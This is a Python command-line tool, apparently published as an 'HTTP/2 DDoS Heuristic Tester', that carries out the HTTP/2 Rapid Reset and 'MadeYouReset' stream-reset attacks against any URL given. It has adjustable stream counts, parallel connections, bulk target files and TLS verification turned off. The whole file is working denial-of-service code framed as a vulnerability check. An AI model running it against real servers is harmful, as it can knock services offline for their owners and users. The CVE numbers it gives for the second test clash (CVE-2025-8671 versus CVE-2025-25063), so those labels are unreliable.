#!/usr/bin/env python3 # -*- coding: utf-8 -*- import argparse import ssl import socket import time from urllib.parse import urlparse from datetime import datetime import json import csv import random from h2.config import H2Configuration from h2.connection import H2Connection from h2.events import ( SettingsAcknowledged, ConnectionTerminated, PingAckReceived, WindowUpdated, RemoteSettingsChanged ) from colorama import Fore, Style, init init(autoreset=True) def print_banner(): banner = f""" {Fore.CYAN}{Style.BRIGHT} ╔╦╗┌─┐┌┬┐┌─┐╦ ╦┌─┐┬ ┬╦═╗┌─┐┌─┐┌─┐┌┬┐ ║║║├─┤ ││├┤ ╚╦╝│ ││ │╠╦╝├┤ └─┐├┤ │ ╩ ╩┴ ┴─┴┘└─┘ ╩ └─┘└─┘╩╚═└─┘└─┘└─┘ ┴ {Style.RESET_ALL} """ print(banner) print(f"{Fore.YELLOW}[ HTTP/2 DDoS Heuristic Tester | CVE-2023-44487 & CVE-2025-8671 ]{Style.RESET_ALL}\n") print(f"{Fore.WHITE}[ m10sec@proton.me | m10sec 2025 ]{Style.RESET_ALL}\n") def check_http2_support(host, port=443, tls=True, timeout=5.0): """Devuelve True si el host negocia HTTP/2 vía ALPN.""" try: raw = socket.create_connection((host, port), timeout=timeout) if tls: ctx = ssl.create_default_context() ctx.set_alpn_protocols(["h2", "http/1.1"]) ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE s = ctx.wrap_socket(raw, server_hostname=host) proto = s.selected_alpn_protocol() s.close() return proto == "h2" else: raw.close() return False except Exception: return False class H2Client: def __init__(self, host, port, tls=True, server_name=None, timeout=6.0): self.host = host self.port = port self.tls = tls self.server_name = server_name or host self.timeout = timeout self.sock = None self.conn = None self.metrics = { "goaway": 0, "goaway_codes": [], "rst_sent": 0, "rst_rate_per_s": 0.0, "streams_opened": 0, "pings": 0, "ping_rtt_ms": [], "remote_max_concurrent_streams": None, "throttled": False, "errors": [] } def _wrap_tls(self, raw): ctx = ssl.create_default_context() # admitir h2 y http/1.1 para mayor compatibilidad en negociación ctx.set_alpn_protocols(["h2", "http/1.1"]) ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE return ctx.wrap_socket(raw, server_hostname=self.server_name) def connect(self): try: raw = socket.create_connection((self.host, self.port), timeout=self.timeout) self.sock = self._wrap_tls(raw) if self.tls else raw self.sock.settimeout(self.timeout) cfg = H2Configuration(client_side=True, header_encoding="utf-8") self.conn = H2Connection(config=cfg) self.conn.initiate_connection() self._send(self.conn.data_to_send()) # leer cualquier respuesta inicial (SETTINGS) self._drain(0.2) except Exception as e: raise RuntimeError(f"Error conectando a {self.host}:{self.port} -> {e}") def close(self): try: if self.sock: self.sock.close() except Exception: pass def _send(self, data: bytes): if not data: return try: self.sock.sendall(data) except Exception as e: self.metrics["errors"].append(f"send_err:{e}") def _drain(self, dur=0.01): """Lee y procesa eventos H2 durante 'dur' segundos (aprox).""" end = time.time() + dur while time.time() < end: try: data = self.sock.recv(65535) if not data: break events = self.conn.receive_data(data) for ev in events: if isinstance(ev, ConnectionTerminated): self.metrics["goaway"] += 1 # ev.error_code puede existir o no; protegemos try: self.metrics["goaway_codes"].append(ev.error_code) if ev.error_code in (0xb, 0x1): # ENHANCE_YOUR_CALM / PROTOCOL_ERROR self.metrics["throttled"] = True except Exception: pass elif isinstance(ev, RemoteSettingsChanged): # changed_settings es un dict: code -> SettingChanged try: for code, s in ev.changed_settings.items(): # SETTINGS_MAX_CONCURRENT_STREAMS = 0x3 / 3 if code == 0x3 or code == 3: # s tiene atributo new_value self.metrics["remote_max_concurrent_streams"] = getattr(s, "new_value", None) except Exception: pass elif isinstance(ev, PingAckReceived): try: sent_ns = int.from_bytes(ev.ping_data, "big") rtt_ms = (time.time_ns() - sent_ns) / 1e6 self.metrics["ping_rtt_ms"].append(rtt_ms) except Exception: self.metrics["ping_rtt_ms"].append(-1) # enviar cualquier frame que la librería genere (ACKs, etc) self._send(self.conn.data_to_send()) except socket.timeout: break except Exception as e: self.metrics["errors"].append(str(e)) break def ping(self): """Usa H2Connection.ping para obtener los bytes que hay que enviar.""" try: opaque = int(time.time_ns()).to_bytes(8, "big") payload = self.conn.ping(opaque) self._send(payload) self.metrics["pings"] += 1 # vaciar y esperar ack corto self._drain(0.25) except Exception as e: self.metrics["errors"].append(f"ping_err:{e}") def rapid_reset(self, authority, path="/", n_streams=100, header_extra=None, pace_s=0.0): """CVE-2023-44487 baseline: abre streams y los resetea inmediatamente.""" headers_base = [ (":method", "GET"), (":authority", authority), (":scheme", "https" if self.tls else "http"), (":path", path), ("user-agent", "h2-check/rr") ] if header_extra: headers_base.extend(header_extra) start = time.time() for _ in range(n_streams): try: sid = self.conn.get_next_available_stream_id() # end_stream=True para simular petición completa y después resetear self.conn.send_headers(sid, headers_base, end_stream=True) # resetear rápido self.conn.reset_stream(sid, error_code=0x8) # CANCEL self._send(self.conn.data_to_send()) self.metrics["rst_sent"] += 1 self.metrics["streams_opened"] += 1 self._drain(0.0) if pace_s: time.sleep(pace_s) except Exception as e: self.metrics["errors"].append(f"rapid_err:{e}") break dur = max(0.001, time.time() - start) self.metrics["rst_rate_per_s"] = self.metrics["rst_sent"] / dur self._drain(0.5) def made_you_reset_variation(self, authority, path="/", n_streams=100, jitter_ms=2): """CVE-2025-25063 heurística: HEADERS end_stream=False + pequeño jitter y RST.""" headers_base = [ (":method", "GET"), (":authority", authority), (":scheme", "https" if self.tls else "http"), (":path", path), ("user-agent", "h2-check/myr") ] start = time.time() for i in range(n_streams): try: sid = self.conn.get_next_available_stream_id() # Enviamos HEADERS sin finalizar stream (end_stream=False) self.conn.send_headers(sid, headers_base, end_stream=False) self._send(self.conn.data_to_send()) # jitter pequeño antes del RESET time.sleep(random.uniform(0, jitter_ms/1000.0)) self.conn.reset_stream(sid, error_code=0x8) self._send(self.conn.data_to_send()) self.metrics["rst_sent"] += 1 self.metrics["streams_opened"] += 1 if i % 20 == 0: # pedimos ping para medir RTT y hacer ruido self.ping() self._drain(0.0) except Exception as e: self.metrics["errors"].append(f"myr_err:{e}") break dur = max(0.001, time.time() - start) self.metrics["rst_rate_per_s"] = self.metrics["rst_sent"] / dur self._drain(0.8) def classify(metrics): go_enhance = any(code == 0xb for code in metrics["goaway_codes"]) high_rate = metrics["rst_rate_per_s"] > 500 no_limits = (metrics["remote_max_concurrent_streams"] in (None, 0) or (isinstance(metrics["remote_max_concurrent_streams"], int) and metrics["remote_max_concurrent_streams"] > 1000)) rtt_spikes = any(rtt > 200 for rtt in metrics["ping_rtt_ms"] if rtt >= 0) if not metrics["goaway"] and no_limits and high_rate and rtt_spikes: verdict = "LIKELY_VULN" elif not go_enhance and (high_rate or no_limits): verdict = "POSSIBLE" else: verdict = "UNLIKELY" return verdict def scan_for_vulnerability(target_url, mode="myr", streams=200, timeout=6.0, jitter=2, pace=0.0): """Devuelve un dict estilo resumen con soporte HTTP/2 y veredicto heurístico.""" u = urlparse(target_url) tls = (u.scheme == "https") port = u.port or (443 if tls else 80) authority = u.netloc.split(":")[0] or u.path # fallback si se pasa solo host http2_supported = check_http2_support(authority, port=port, tls=tls, timeout=timeout) result = { "Timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S"), "URL": target_url, "HTTP/2 Support": "Yes" if http2_supported else "No", "Vulnerable": "UNKNOWN", "Details": "No se pudo completar el análisis" } if not http2_supported: result["Details"] = "El servidor no negoció HTTP/2 (ALPN)." return result c = H2Client(authority, port, tls=tls, server_name=authority, timeout=timeout) try: c.connect() if mode in ("rapid", "both"): c.rapid_reset(authority, path=u.path or "/", n_streams=streams, pace_s=pace) if mode in ("myr", "both"): c.made_you_reset_variation(authority, path=u.path or "/", n_streams=streams, jitter_ms=jitter) verdict = classify(c.metrics) mapping = {"LIKELY_VULN": "LIKELY", "POSSIBLE": "POSSIBLE", "UNLIKELY": "UNLIKELY"} result["Vulnerable"] = mapping.get(verdict, verdict) result["Details"] = ( f"streams={c.metrics['streams_opened']} rst={c.metrics['rst_sent']} " f"rate={c.metrics['rst_rate_per_s']:.1f}/s goaway={c.metrics['goaway']} " f"codes={c.metrics['goaway_codes']} mcs={c.metrics['remote_max_concurrent_streams']} " f"errors={len(c.metrics['errors'])}" ) except Exception as e: result["Vulnerable"] = "UNKNOWN" result["Details"] = f"Error durante prueba: {e}" finally: c.close() return result def _normalize_target(s: str) -> str: s = (s or "").strip() if not s: return s if not s.startswith("http"): s = "https://" + s return s def interactive_menu(): print("\n=== HTTP/2 DDoS Heuristic Tester ===") print("1) CVE-2023-44487 (Rapid Reset)") print("2) CVE-2025-25063 (MadeYouReset)") print("3) Ambos (comparativa)") print("4) Salir") choice = input("Selecciona opción [1-4]: ").strip() or "2" if choice not in {"1","2","3"}: print("Saliendo.") return target = _normalize_target(input("Target (https://dominio o http://ip): ").strip()) if not target: print("No se ingresó target. Bye Bye sweet hearth.") return try: streams = int((input("Streams por conexión [200]: ") or "200").strip()) except Exception: streams = 200 try: jitter = int((input("Jitter ms (solo MYR) [2]: ") or "2").strip()) except Exception: jitter = 2 mode = "rapid" if choice == "1" else ("myr" if choice == "2" else "both") summary = scan_for_vulnerability(target, mode=mode, streams=streams, jitter=jitter) print(json.dumps(summary, ensure_ascii=False, indent=2)) def bulk_scan_from_txt(path, mode="myr", streams=200, timeout=6.0, jitter=2, pace=0.0, out_json=None, out_csv=None, line_by_line=True): results = [] try: with open(path, "r", encoding="utf-8") as f: lines = [ln.strip() for ln in f if ln.strip() and not ln.strip().startswith("#")] except Exception as e: print(f"[!] No pude leer '{path}': {e}") return for target in lines: target_url = _normalize_target(target) try: res = scan_for_vulnerability(target_url, mode=mode, streams=streams, timeout=timeout, jitter=jitter, pace=pace) except Exception as e: res = { "Timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S"), "URL": target_url, "HTTP/2 Support": "UNKNOWN", "Vulnerable": "UNKNOWN", "Details": f"Error general: {e}" } results.append(res) if line_by_line: print(json.dumps(res, ensure_ascii=False)) if out_json: try: with open(out_json, "w", encoding="utf-8") as jf: json.dump(results, jf, ensure_ascii=False, indent=2) print(f"[+] Guardado JSON en {out_json}") except Exception as e: print(f"[!] No pude guardar JSON en {out_json}: {e}") if out_csv: try: with open(out_csv, "w", encoding="utf-8", newline="") as cf: writer = csv.DictWriter(cf, fieldnames=["Timestamp","URL","HTTP/2 Support","Vulnerable","Details"]) writer.writeheader() for r in results: writer.writerow(r) print(f"[+] Guardado CSV en {out_csv}") except Exception as e: print(f"[!] No pude guardar CSV en {out_csv}: {e}") # ----------------------------- # Punto de entrada # ----------------------------- def main(): print_banner() ap = argparse.ArgumentParser(description="HTTP/2 MadeYouReset heuristic checker") ap.add_argument("target", nargs="?", help="URL objetivo, p.ej. https://example.com (opcional si usas --menu o --targets-file)") ap.add_argument("--path", default="/", help="Ruta a solicitar") ap.add_argument("--mode", choices=["rapid", "myr", "both"], default="myr", help="Prueba: rapid (CVE-2023-44487), myr (CVE-2025-25063), both") ap.add_argument("--conns", type=int, default=1, help="Conexiones paralelas") ap.add_argument("--streams", type=int, default=200, help="Streams por conexión") ap.add_argument("--timeout", type=float, default=6.0, help="Timeout socket") ap.add_argument("--pace", type=float, default=0.0, help="Pausa entre streams (rapid)") ap.add_argument("--jitter", type=int, default=2, help="Jitter ms (myr)") ap.add_argument("--json", action="store_true", help="Salida JSON resumida (scan_for_vulnerability)") ap.add_argument("--menu", action="store_true", help="Abrir menú interactivo") ap.add_argument("--targets-file", help="Ruta a TXT con un target por línea (modo bulk)") ap.add_argument("--out-json", help="Guardar resultados bulk en archivo JSON") ap.add_argument("--out-csv", help="Guardar resultados bulk en archivo CSV") args = ap.parse_args() # Bulk if args.targets_file: bulk_scan_from_txt( args.targets_file, mode=args.mode, streams=args.streams, timeout=args.timeout, jitter=args.jitter, pace=args.pace, out_json=args.out_json, out_csv=args.out_csv, line_by_line=True, ) return # menu o falta target if args.menu or not args.target: interactive_menu() return # normalizar target si el usuario no incluye scheme args.target = _normalize_target(args.target) u = urlparse(args.target) tls = (u.scheme == "https") port = u.port or (443 if tls else 80) authority = u.netloc.split(":")[0] if args.json: summary = scan_for_vulnerability( args.target, mode=args.mode, streams=args.streams, timeout=args.timeout, jitter=args.jitter, pace=args.pace ) print(json.dumps(summary, ensure_ascii=False, indent=2)) return clients = [] try: for _ in range(args.conns): c = H2Client(authority, port, tls=tls, server_name=authority, timeout=args.timeout) try: c.connect() clients.append(c) except Exception as e: print(f"[!] No pude crear cliente para {authority}:{port} -> {e}") if not clients: print("[!] No se pudo establecer ninguna conexión H2. Saliendo.") return for c in clients: if args.mode in ("rapid", "both"): c.rapid_reset(authority, path=args.path, n_streams=args.streams, pace_s=args.pace) if args.mode in ("myr", "both"): c.made_you_reset_variation(authority, path=args.path, n_streams=args.streams, jitter_ms=args.jitter) print("\n=== Resultados ===") for i, c in enumerate(clients, 1): v = classify(c.metrics) print(f"[Conn {i}] verdict={v} streams={c.metrics['streams_opened']} rst={c.metrics['rst_sent']} " f"rate={c.metrics['rst_rate_per_s']:.1f}/s goaway={c.metrics['goaway']} " f"codes={c.metrics['goaway_codes']} mcs={c.metrics['remote_max_concurrent_streams']} " f"rtt_ms={','.join(f'{x:.0f}' if x>=0 else '-' for x in c.metrics['ping_rtt_ms'])} " f"errors={len(c.metrics['errors'])}") finally: for c in clients: c.close() if __name__ == "__main__": main()